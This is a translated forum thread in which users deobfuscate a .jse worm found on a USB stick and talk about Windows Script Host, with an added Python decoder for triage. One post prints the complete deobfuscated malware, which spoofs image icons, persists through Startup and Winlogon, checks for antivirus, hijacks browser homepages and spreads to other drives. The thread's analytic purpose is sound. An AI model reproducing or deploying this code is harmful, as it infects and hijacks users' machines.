Title: [Help] deciphering a virus
Posted by: danny920825 on 11 July 2015, 17:04 pm
Hi everyone, I'm bringing you some homework, so to speak, for those who specialize in the art of cryptography. The thing is that a couple of days ago I found on my USB stick a file with a photo icon and a name like "DSC01012 .jse", i.e. they were trying to hide the extension by padding the name. That made me curious, so I looked at it and found the code I'm bringing you today, to see if you can help me decipher it and find out what it really does. By the way, my brother-in-law did run it, and what it does for the user is supposedly open the desktop wallpaper photo. Without further ado, here is the code:
z="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";ll="";dm=z.length-2;rad=new Number(z.substring(dm,dm+2));for(y=0;y<dm;y+=2){num=z.substring(y,y+2);ld=new Number("0x"+num);an=ld.toString(10);ch=String.fromCharCode(an-rad);ll+=ch;}eval(ll);
Sorry, but I don't know any other way to upload the code so that it comes out on separate lines. The other thing I can do is upload it to MEGA as a .txt and someone re-uploads it here deciphered. Regards
Title: Re: [Help] deciphering a virus
Posted by: engel lex on 11 July 2015, 17:39 pm
I didn't know VBS looked so much like JS... you just have to follow the steps without the eval (so it doesn't execute) and look at the variable that gets evaluated. Here it is without the first layer of obfuscation:
try { a = WScript.CreateObject('Scri' + 'pting.Fi' + 'leSys' + 'temObj' + 'ect'); b = WScript.CreateObject('WSc' + 'ript.Sh' + 'ell'); s = WScript.CreateObject('She' + 'll.Appli' + 'cation'); wl = WScript.CreateObject('WbemScr' + 'ipting.SWbemL' + 'ocator'); db = WScript.CreateObject('ADO' + 'DB.Str' + 'eam'); db.CharSet = "US-ASCII"; db.Type = 2; c3 = b.SpecialFolders("Startup"); nt6 = (b.RegRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion') >= 6 ? true : false); jico = b.RegRead("HKLM\\SOFTWARE\\Classes\\" + b.RegRead("HKLM\\SOFTWARE\\Classes\\.jpg\\") + "\\DefaultIcon\\"); ico = "explorer.exe"; g = WScript.ScriptFullName; da = new Date(); ano = da.getYear() + ""; mes = da.getMonth(); dia = da.getDate(); hra = 0; antv = new Array(""); rgk = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"; wlg = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"; gn = new Array("IMG", "IMG_", "PIC", "DSC", "CIMG", "HPIM", "IMAG", "DSCF", "DSCN", "DCIM", "IM", "PICT", "SAM_"); sp = ""; for (r = 0; r < 94; r++) { sp += " "; } ex = gn[Math.round(Math.random() * 12)] + ano.substring(2, 4) + "" + mes + dia + ".JPG" + sp + ".jse"; jex = ""; tas = "explorer"; fsz = a.GetFile(g).Size; wsc = WScript.FullName; stl = "https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+"; stp = stl + fsz; if (s.NameSpace(26) == "Roaming") { tot = a.GetFolder(s.NameSpace(26).ParseName("Microsoft").Path).ParentFolder; } else { tot = s.NameSpace(40).ParseName(s.NameSpace(26)).Path; } nt(); } catch (e) {} sf = ""; function nt() { try { c1 = s.NameSpace(28).ParseName("microsoft"); c2 = c1.GetFolder.Items().Count; rf = Math.round(Math.random() * c2 - 1); c4 = c1.GetFolder.Items().item(rf).Path; if (a.FolderExists(c4) == false) { c4 = 
a.GetFile(c4).ParentFolder; } } catch (e) { c4 = c1.Path; } c5 = Math.random() * 8 + 1 + ""; c5 = c5.replace(".", ""); try { b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { jtyp = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName"); b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} if (g.substring(g.lastIndexOf("\\") + 1, g.length).toLowerCase().search(".jpg" + sp + ".jse") != -1) { try { if (a.FileExists(g.substring(0, g.lastIndexOf(sp + ".jse"))) == true) { b.run('"' + g.substring(0, g.lastIndexOf(sp + ".jse")) + '"'); } else { wp = b.RegRead("HKCU\\Control Panel\\Desktop\\Wallpaper"); if (wp.substring(wp.lastIndexOf("\\") + 1, wp.length) == "TranscodedWallpaper") { jpgc = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\").replace("%1", wp); b.run(jpgc); } else { b.run('"' + wp + '"'); } } } catch (e) {} try { sc = wl.ConnectServer(null, "root\\default"); rg = sc.Get("StdRegProv"); m = rg.Methods_.Item("EnumValues"); pin = m.InParameters.SpawnInstance_(); rk = new Object(); rk["HKCU"] = rk["HKEY_CURRENT_USER"] = 0x80000001; rv = rk[rgk.substr(0, rgk.indexOf("\\"))]; pin.hDefKey = rv; pin.sSubKeyName = rgk.substr(rgk.indexOf("\\") + 1); pot = rg.ExecMethod_(m.Name, pin); ak = pot.sNames.toArray(); for (key in ak) { tts = b.RegRead(rgk + "\\" + ak[key]) + ""; if (tts.search(".exe") != -1) { tts2 = tts.substring(0, tts.search(".exe")); tts3 = tts2.substring(tts2.lastIndexOf(":") - 1, tts2.length) + ".exe"; if (a.FileExists(tts3) == true) { ico = tts3; } if (tts2.indexOf("\\") != -1) { tts2 = tts2.substring(tts2.lastIndexOf("\\") + 1, tts2.length); } tas = tts2; } } } catch (e) {} if (tas.indexOf(" ") != -1) { tas = 
tas.substring(0, tas.indexOf(" ")); } if (tas.indexOf(".") != -1) { tas = tas.substring(0, tas.indexOf(".")); } try { newd = fsz; olddf = b.RegRead(wlg); olddf = olddf.substring(olddf.lastIndexOf('" "') + 3, olddf.lastIndexOf('"')); } catch (e) { olddf = shcu(); } if (a.FileExists(olddf) == true) { c4 = a.GetFile(olddf).ParentFolder; oldd = a.GetFile(olddf).size; } else { oldd = 0; olddf = c4 + "\\" + c5; } if (newd >= oldd) { if (a.FileExists(olddf) == true) { a.GetFile(olddf).Attributes = 0; } db.Open(); try { av = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter" + (nt6 ? '2' : '')); avi = av.ExecQuery("SELECT * FROM AntiVirusProduct", "WQL"); navi = new Enumerator(avi); antv = new Array(); for (; !navi.atEnd(); navi.moveNext()) { oav = navi.item(); antv.push(oav.displayName); } } catch (e) { antv = new Array("NAC"); } try { vic = "<" + b.RegRead("HKCU\\Volatile Environment\\LOGONSERVER").replace("\\\\", "") + ":" + b.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName") + "=" + s.NameSpace(40) + ":" + antv + ">"; } catch (e) { vic = ""; } cod = ci(); if (cod.search(vic) == -1 && rad != 0) { nda = vic + "**/"; his = cod.replace("**/", nda); db.WriteText(his); } else { db.WriteText(cod); } db.SaveToFile(olddf, 2); db.Close(); try { if (a.GetFile(olddf).OpenAsTextStream(1, -2).ReadAll().charCodeAt(0) != 122) { a.CopyFile(g, olddf, true); } a.GetFile(olddf).Attributes = 2; } catch (e) {} wsh = c4 + "\\" + tas + ".exe"; try { a.CopyFile(wsc, wsh); } catch (e) {} a.GetFile(wsh).Attributes = 2; try { drg = '"' + wsh + '" "' + olddf + '" //E:JScript //B'; shcu(); ec = b.CreateShortcut(c3 + "\\" + tas + ".lnk"); ec.TargetPath = c4 + "\\" + tas + ".exe"; ec.Arguments = '"' + olddf + '" //E:JScript //B -ns'; ec.IconLocation = ico; ec.Save(); b.RegWrite(wlg, drg, 'REG_SZ'); WScript.Sleep(9999); if (b.RegRead(wlg) == drg) { a.DeleteFile(c3 + "\\" + tas + ".lnk"); } } catch (e) {} } } else { try { if 
(WScript.Arguments.length == 0) { b.run("explorer.exe"); } } catch (e) {} try { fcfp = new Array(); tcmd = new Array(); for (t = 0; t < 9; t++) { tcmd.push(tot + "\\TC201" + t + "\\tcignore.txt"); try { fcfp.push(s.NameSpace(38).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} try { fcfp.push(s.NameSpace(48).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} } try { tcmd.push(s.NameSpace(38).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(48).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(28).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(26).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} tcmd.push("c:\\totalcmd\\tcignore.txt"); for (t = 0; t < tcmd.length; t++) { if (a.FileExists(tcmd[t].replace("tcignore.txt", "wincmd.ini")) == true) { try { db.Open(); if (a.FileExists(tcmd[t]) == false) { ttn = a.CreateTextFile(tcmd[t], true); ttn.Write("**.**.jse"); ttn.close(); } igl = ""; try { db.LoadFromFile(tcmd[t]); igl = db.ReadText; } catch (e) {} db.Close(); if (igl.indexOf("**.**.jse") == -1) { db.Open(); db.WriteText(igl, 1); db.WriteText("**.**.jse", 1); a.DeleteFile(tcmd[t]); db.SaveToFile(tcmd[t]); db.Close(); } } catch (e) {} try { tor = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 1, true, 0); toa = tor.ReadAll(); if (toa.search("IgnoreListFileEnabled=0") != -1) { toa = toa.replace("IgnoreListFileEnabled=0", "IgnoreListFileEnabled=1"); } if (toa.search("IgnoreListFile=") == -1) { toa = toa.replace("[Configuration]", "[Configuration]" + "\nIgnoreListFile=" + tcmd[t]); } if (tcmd[t].search("TC201") != -1) { if (toa.search("=*.jse") == -1) { filt = toa.substring(toa.lastIndexOf("Filter") + 6, toa.lastIndexOf(".icon=")); enf = toa.substring(toa.lastIndexOf("Filter"), toa.length); enl = enf.substring(0, 
enf.indexOf("\n") + 1); fln = new Number(filt) + 1; ficon = toa.substring(toa.search("Filter11.icon=") + 14, toa.length); dicon = ficon.substring(0, ficon.search("\n")); toa = toa.replace(enl, enl + "\nFilter" + fln + "=*.jse\nFilter" + fln + ".icon=" + dicon + "\n"); toa = toa.replace("FileTipWindows=1", "FileTipWindows=0"); } } tor.close(); tow = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 2, true, 0); tow.Write(toa); tow.close(); } catch (e) {} } } } catch (e) {} try { b.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", stp, "REG_SZ") } catch (e) {} try { if (a.FolderExists(tot + "\\Mozilla\\Firefox\\Profiles") == true) { fpf = a.GetFolder(tot + "\\Mozilla\\Firefox\\Profiles"); pff = new Enumerator(fpf.SubFolders); for (; !pff.atEnd(); pff.moveNext()) { pfs = pff.item() + ""; if (pfs.search(".default") != -1) { fcfp.push(pfs); } } } for (q = 0; q < fcfp.length; q++) { try { if (a.FileExists(fcfp[q] + "\\prefs.js") == true); { fjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 1); fjs = fjf.ReadAll(); fjf.close(); usp = 'user_pref("browser.startup.homepage",'; if (fjs.indexOf(usp) != -1) { fjs1 = fjs.substring(fjs.indexOf(usp) + 37, fjs.length); fjs2 = fjs1.substring(0, fjs1.indexOf(');') + 2); fjs3 = fjs.replace(usp + fjs2, usp + ' "' + stp + '");'); wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 2); wjf.Write(fjs3); } else { wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 8); wjf.WriteLine('\n' + usp + ' "' + stp + '");'); } wjf.close(); } } catch (e) {} } } catch (e) {} try { gfs = s.NameSpace(28).ParseName("Google").Path + "\\Chrome\\User Data\\Default\\Preferences"; if (a.FileExists(gfs) == true) { gjf = a.OpenTextFile(gfs, 1); gjs = gjf.ReadAll(); gjf.close(); gjsn = gjs.length; urs = '"urls_to_restore_on_startup": ['; ros = '"restore_on_startup":'; rosm = '"restore_on_startup_migrated":'; if (gjs.indexOf(stl) == -1) { if (gjs.indexOf(urs) != -1) { gjs1 = gjs.substring(gjs.indexOf(urs) + 31, gjsn); gjs2 = gjs1.substring(0, 
gjs1.indexOf("]") + 1); gjs3 = gjs.replace(urs + gjs2, urs + ' "' + stp + '", ' + gjs2); } else { gjs1 = gjs.substring(gjs.indexOf(rosm), gjsn); gjs2 = gjs1.substring(0, gjs1.indexOf("\n") + 1); gjs3 = gjs.replace(gjs2, rosm + ' true,\n\t' + urs + ' "' + stp + '" ]\n'); } gjs4 = gjs.substring(gjs.indexOf(ros), gjsn); gjs5 = gjs4.substring(0, gjs4.indexOf(',') + 1); gjs3 = gjs3.replace(gjs5, ros + ' 4,'); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs3); wjg.close(); } else { fds = gjs.substring(gjs.indexOf(stl), gjs.length); fdc = fds.substring(0, fds.indexOf('"')); gjs4 = gjs.replace(fdc, stp); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs4); wjg.close(); } } } catch (e) {} mk(); } } function mk() { WScript.Sleep(120000); try { c = new Enumerator(a.Drives); for (; !c.atEnd(); c.moveNext()) { tipodisco = c.item().DriveType; switch (tipodisco) { case 1: case 3: if (c.item() != "A:" && c.item() != "B:") { try { sf = a.GetFolder(pe(c.item() + "\\")); tgf = new Enumerator(sf.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(sf + "\\" + ex) == false) { if (jex != "") { ex = jex; } a.CopyFile(g, sf + "\\" + ex); if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex).Attributes = a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(sf + "\\" + ex).Attributes = 0 }; if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(sf + "\\" + ex).Size < fsz) { a.GetFile(sf + "\\" + ex).Attributes = 0; a.DeleteFile(sf + "\\" + ex); a.CopyFile(g, sf + "\\" + ex); a.GetFile(sf + "\\" + ex).Attributes = 0; } } } catch (e) 
{} sf = ""; } break; default: break; } } } catch (e) {} try { if (hra < 12) { hra += 1; } if (hra == 12) { dns = s.NameSpace(18); ens = dns.Items().Count; hns = new Array(); for (f = 0; f < ens; f++) { gns = dns.Items().item(f); hns.push("dns.Items().Item(" + f + ").GetFolder"); } for (i = 0; i < hns.length; i++) { try { jns = eval(hns[i]).Items().Count; for (l = 0; l < jns; l++) { if (a.FolderExists(eval(hns[i] + ".Items().item(" + l + ").Path")) == false) { hns.push(hns[i] + ".Items().item(" + l + ").GetFolder"); } else { try { dis = pe(eval(hns[i] + ".Items().item(" + l + ").Path") + "\\") + ""; di = a.GetFolder(dis); tgf = new Enumerator(di.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(di + "\\" + ex) == false && dis.charAt(1) != ":") { if (jex != "") { ex = jex; } a.CopyFile(g, di + "\\" + ex); if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex).Attributes = a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(di + "\\" + ex).Attributes = 0; } if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(di + "\\" + ex).Size < fsz) { a.GetFile(di + "\\" + ex).Attributes = 0; a.DeleteFile(di + "\\" + ex); a.CopyFile(g, di + "\\" + ex); a.GetFile(di + "\\" + ex).Attributes = 0; } } } catch (e) {} } } } catch (e) {} } hra = 0; } } catch (e) {} mk(); } function ci() { try { db2 = a.OpenTextFile(g, 1); g2 = db2.ReadAll(); db2.Close(); g3 = g2.substring(g2.search('z="') + 3, g2.search('";')); g1 = g2.substring(0, g2.search('z="') + 3); gr = g2.substring(g2.search('";'), g2.length); t = ll; tt = 
""; tm = t.length; rac = Math.round(Math.random() * 98) + 1; for (x = 0; x < tm; x++) { num = t.charCodeAt(x) + rac; hx = num.toString(16); if (hx.length < 2) { hx = "0" + hx; } tt += hx; hx = ''; } if (rac < 10) { rac = "0" + rac; } tt += rac; g4 = g1 + tt + gr; return g4; } catch (e) {} } function pe(tar) { onef = false; sfp = a.GetFolder(tar); tgc = new Enumerator(sfp.subFolders); for (; !tgc.atEnd(); tgc.moveNext()) { stc = tgc.item().Name.toLowerCase(); if (stc.search("foto") != -1 || stc.search("photo") != -1 || stc.search("image") != -1 || stc.search("im\u00E1ge") != -1 || stc.search("picture") != -1) { if (onef == false) { sfp = a.GetFolder(tgc.item() + "\\"); } onef = true; } } return sfp; } function shcu() { cshc = ""; lnks = new Enumerator(a.GetFolder(c3).files); for (; !lnks.atEnd(); lnks.moveNext()) { try { lks = lnks.item() + ""; if (lks.substring(lks.length - 4, lks.length).toLowerCase() == ".lnk") { lnka = b.CreateShortcut(lnks.item()).Arguments; if (lnka.search("//E:JScript //B -ns") != -1) { cshc = lnka.substring(lnka.indexOf('"') + 1, lnka.lastIndexOf('"')); a.DeleteFile(lnks.item()); } } } catch (e) {} } return cshc; }
Title: Re: [Help] deciphering a virus
Posted by: danny920825 on 11 July 2015, 19:05 pm
Thanks. You're the best!!
Title: Re: [Help] deciphering a virus
Posted by: dRak0 on 12 July 2015, 09:45 am
Cryptanalysis, you mean.
Title: Re: [Help] deciphering a virus
Posted by: Mad Antrax on 13 July 2015, 09:33 am
Excellent work engel lex, now all that's left is to analyze the functions the script runs!
Title: Re: [Help] deciphering a virus
Posted by: danny920825 on 13 July 2015, 14:52 pm
And all of that is JavaScript?? So a web programming language can be used for desktop applications? Please, could someone explain the functions, I don't understand all of them.
Title: Re: [Help] deciphering a virus
Posted by: engel lex on 13 July 2015, 15:39 pm
I repeat my comment: I didn't know VBS looked so much like JS. This isn't JS (JavaScript), it's VBS (Visual Basic Script), it only works locally.
Title: Re: [Help] deciphering a virus
Posted by: Mad Antrax on 13 July 2015, 16:34 pm
> I repeat my comment
> this isn't JS (JavaScript), it's VBS (Visual Basic Script), it only works locally
Actually that code is JavaScript. The Windows script interpreter (wscript + cscript) can interpret (run) both VBS and JS. I'm going to reverse the functions to see exactly what it does, although I'm not very familiar with JS... Regards
Title: Re: [Help] deciphering a virus
Posted by: engel lex on 13 July 2015, 17:00 pm
Windows interprets JS?
Can "WScript" be used from JScript?
That's why I assume it's VBS
Title: Re: [Help] deciphering a virus
Posted by: Mad Antrax on 13 July 2015, 17:06 pm
> Windows interprets JS?
> Can "WScript" be used from JScript?
> That's why I assume it's VBS
Exactly, the script interpreter engine (WScript.exe / CScript.exe) interprets both VBS and JS, and their variants VBE, JSE, etc... the icon differs: a green scroll (VBS) or a yellow one (JS). If you look, the original VB/VBA/VBS syntax doesn't use braces ({}) to delimit statements; instead it uses the "End" keyword, while braces are used in languages like C/C++ and JS (among many others). Another clue is that JS needs a character to mark the end of a line (";") whereas VB/VBS doesn't need it :) I've edited your post, setting the GeSHi tag to JS instead of VBS, now it shows up correctly formatted :P
Title: Re: [Help] deciphering a virus
Posted by: engel lex on 13 July 2015, 17:09 pm
Hmm, true! It doesn't have the "sub function" stuff or anything like that XD, that's why it seemed so strangely similar to JScript to me from the start
Title: Re: [Help] deciphering a virus
Posted by: Eleкtro on 13 July 2015, 17:10 pm
Adding to @Mad Antrax's comment:
➢ Windows Script Host (https://en.wikipedia.org/wiki/Windows_Script_Host)
Regards
Title: Re: [Help] deciphering a virus
Posted by: danny920825 on 13 July 2015, 17:40 pm
Hello again, let me ask you something, now that I see the 3 greats I admire have joined in (Elektro, Mad Antrax and engel lex). I was reading the Wikipedia article and it says yes, Windows Script Host runs JScript and its derivatives, VBS and its derivatives, and others like WSH and WSF. But what I want to ask, as an aside to your investigation into what this little friend we're figuring out does, is how do I post the code so it comes out the way "engel lex" posted it, i.e. indented, because mine came out all run together.
Title: Re: [Help] deciphering a virus
Posted by: Mad Antrax on 13 July 2015, 17:46 pm
> Hello again, let me ask you something, now that I see the 3 greats I admire have joined in (Elektro, Mad Antrax and engel lex). I was reading the Wikipedia article and it says yes, Windows Script Host runs JScript and its derivatives, VBS and its derivatives, and others like WSH and WSF. But what I want to ask, as an aside to your investigation into what this little friend we're figuring out does, is how do I post the code so it comes out the way "engel lex" posted it, i.e. indented, because mine came out all run together.
The original code you posted is "obfuscated": basically it's a looooong string of characters, then a loop walks the string and converts each hexadecimal pair to its decimal value, then looks that number up in the ASCII table and turns it into a "printable" character. At the end of it all it ends up building a string of JS code that is executed by the eval() function. engel lex dumped the final variable "ll" and pasted it under GeSHi tags so it can be read more comfortably. Now all that's left is to analyze what happens on each line of the "deobfuscated" JS :D
Title: Re: [Help] deciphering a virus
Posted by: engel lex on 13 July 2015, 17:47 pm
Hmmm, sorry for not explaining...
What I did:
Since I know the eval (the last instruction) is what executes it, I put the code into the Chrome console and then looked at what "ll" contained.
That gives you the whole code on one line... from there I went to http://jsbeautifier.org/, dropped the code in and "beautified" it. That tool is very useful for deobfuscating.
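An eval-free way to do what engel lex describes, as an added example that is not from the thread: it reverses the hex-pair/offset loop from the first post the way Mad Antrax explains it, then collapses the split-string ProgIDs from the second layer and lists the registry paths and persistence markers a defender would look for. Function names, the marker table and the fixture are constructed for this example.

```python
"""
Eval-free analysis helpers for the two obfuscation layers seen in the posted .jse
dropper: (1) hex pairs shifted by a decimal trailer, (2) ProgIDs split into
string concatenations.  Hypothetical helper names; not code from the thread.
"""
import re


def decode_layer1(z: str) -> str:
    """Reverse the decoding loop from the first post without eval().

    z is a run of two-digit hex values; the last two characters are a decimal
    offset ('rad' in the original) that was added to every character code.
    """
    if len(z) < 2 or len(z) % 2:
        raise ValueError("payload must be an even-length hex string plus 2-digit trailer")
    body, rad = z[:-2], int(z[-2:], 10)
    return "".join(chr(int(body[i:i + 2], 16) - rad) for i in range(0, len(body), 2))


def encode_layer1(text: str, rac: int) -> str:
    """Re-implementation of the re-packing step in the script's ci(), used here
    only to build test fixtures: add rac (1..99) to each code, two hex digits
    each, then append rac as a two-digit decimal trailer."""
    if not 1 <= rac <= 99:
        raise ValueError("rac must be in 1..99 as in the original")
    out = []
    for ch in text:
        v = ord(ch) + rac
        if v > 0xFF:
            raise ValueError(f"{ch!r} + {rac} does not fit in two hex digits")
        out.append(f"{v:02x}")
    return "".join(out) + f"{rac:02d}"


# A chain of two or more adjacent string literals joined with '+'.
_CHAIN = re.compile(r'''(?:\'[^\']*\'|"[^"]*")(?:\s*\+\s*(?:\'[^\']*\'|"[^"]*"))+''')
_LIT = re.compile(r'''\'([^\']*)\'|"([^"]*)"''')


def unsplit_strings(src: str) -> str:
    """Collapse 'Scri' + 'pting.Fi' + ... back into one literal (layer 2)."""
    def join(m: re.Match) -> str:
        joined = "".join(a + b for a, b in _LIT.findall(m.group(0)))
        quote = '"' if "'" in joined else "'"
        return quote + joined + quote
    return _CHAIN.sub(join, src)


_PROGID = re.compile(r'''CreateObject\(\s*([\'"])([^\'"]+)\1''')
# Registry paths as they appear in JScript source, i.e. with doubled backslashes.
_REGPATH = re.compile(r'''HK(?:LM|CU|EY_[A-Z_]+)(?:\\\\[^\\\'";+]+)+''')
# Behaviours worth flagging in triage; all of them are visible in the decoded script.
PERSISTENCE_MARKERS = {
    "startup_folder_shortcut": r'''SpecialFolders\(\s*[\'"]Startup[\'"]\s*\)''',
    "winlogon_shell_hijack": r"Winlogon\\\\Shell",
    "run_key": r"CurrentVersion\\\\Run\b",
    "jse_icon_spoofing": r"JSEFile\\\\DefaultIcon",
    "nested_eval": r"\beval\s*\(",
}


def triage(decoded: str) -> dict:
    """Static indicators from decoded script text: COM ProgIDs instantiated,
    registry paths referenced (normalised to single backslashes) and which
    persistence/evasion markers are present."""
    text = unsplit_strings(decoded)
    progids = sorted({m.group(2) for m in _PROGID.finditer(text)})
    regpaths = sorted({m.group(0).replace("\\\\", "\\") for m in _REGPATH.finditer(text)})
    markers = sorted(n for n, p in PERSISTENCE_MARKERS.items() if re.search(p, text))
    return {"progids": progids, "registry_paths": regpaths, "markers": markers}


# Constructed fixture modelled on the first lines of the decoded script (not the
# real payload), packed with the script's own scheme and offset 7.
SAMPLE_PLAIN = (
    "try { a = WScript.CreateObject('Scri' + 'pting.Fi' + 'leSys' + 'temObj' + 'ect'); "
    "b = WScript.CreateObject('WSc' + 'ript.Sh' + 'ell'); "
    'c3 = b.SpecialFolders("Startup"); '
    'wlg = "HKCU\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell"; '
    "b.RegWrite(wlg, drg, 'REG_SZ'); } catch (e) {}"
)
SAMPLE_Z = encode_layer1(SAMPLE_PLAIN, 7)

if __name__ == "__main__":
    decoded = decode_layer1(SAMPLE_Z)
    assert decoded == SAMPLE_PLAIN
    for key, value in triage(decoded).items():
        print(f"{key}: {value}")
```

Feed the real `z` string from the sample into `decode_layer1` and the result is the same text engel lex recovered, without the script ever running.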
Title: Re: [Help] deciphering a virus
Posted by: danny920825 on 13 July 2015, 18:17 pm
Thanks for the tip about the website. But what I mean is, when I post a piece of code, for example in VBS, so that it comes out with colors, what do I have to put?
Title: Re: [Help] deciphering a virus
Posted by: engel lex on 13 July 2015, 18:22 pm
:P the GeSHi tags
They're above the emoticons, on the right; the languages show up there and you paste the code between the tags :P
Title: Re: [Help] deciphering a virus
Posted by: danny920825 on 13 July 2015, 18:27 pm
Thanks, I see it now. Thank you very much for everything. In the end, what does the code do?
Title: Re: [Help] deciphering a virus
Posted by: MCKSys Argentina on 13 July 2015, 18:33 pm
I'll answer you with questions: What have you done to find out, besides asking others? Have you even tried to understand it on your own?
:silbar:
Title: Re: [Help] deciphering a virus
Posted by: danny920825 on 13 July 2015, 19:19 pm
Yep, but I only understand a little VBS and 2 of its fundamental objects, 'scripting.filesystemobject' and 'wscript.shell'.
To start, it defines 4 objects: the 2 above, Shell.Application and WbemScripting.SWbemLocator, both unknown to me.
From there, as far as I can see, it goes on to select the encoding, which I don't know the purpose of. Then it defines variables such as the user's Startup folder and several registry keys; the first, I suppose, is the autostart one and the second is the script's icon, which it takes from the .jpg class. Up to there everything is easy to understand, but the rest gets hard because I don't understand the code.
Title: Re: [Help] deciphering a virus
Posted by: Wolfkey on 8 October 2015, 09:37 am
{} sf = ""; } break; default: break; } } } catch (e) {} try { if (hra < 12) { hra += 1; } if (hra == 12) { dns = s.NameSpace(18); ens = dns.Items().Count; hns = new Array(); for (f = 0; f < ens; f++) { gns = dns.Items().item(f); hns.push("dns.Items().Item(" + f + ").GetFolder"); } for (i = 0; i < hns.length; i++) { try { jns = eval(hns[i]).Items().Count; for (l = 0; l < jns; l++) { if (a.FolderExists(eval(hns[i] + ".Items().item(" + l + ").Path")) == false) { hns.push(hns[i] + ".Items().item(" + l + ").GetFolder"); } else { try { dis = pe(eval(hns[i] + ".Items().item(" + l + ").Path") + "\\") + ""; di = a.GetFolder(dis); tgf = new Enumerator(di.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(di + "\\" + ex) == false && dis.charAt(1) != ":") { if (jex != "") { ex = jex; } a.CopyFile(g, di + "\\" + ex); if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex).Attributes = a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(di + "\\" + ex).Attributes = 0; } if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(di + "\\" + ex).Size < fsz) { a.GetFile(di + "\\" + ex).Attributes = 0; a.DeleteFile(di + "\\" + ex); a.CopyFile(g, di + "\\" + ex); a.GetFile(di + "\\" + ex).Attributes = 0; } } } catch (e) {} } } } catch (e) {} } hra = 0; } } catch (e) {} mk(); } function ci() { try { db2 = a.OpenTextFile(g, 1); g2 = db2.ReadAll(); db2.Close(); g3 = g2.substring(g2.search('z="') + 3, g2.search('";')); g1 = g2.substring(0, g2.search('z="') + 3); gr = g2.substring(g2.search('";'), g2.length); t = ll; tt = 
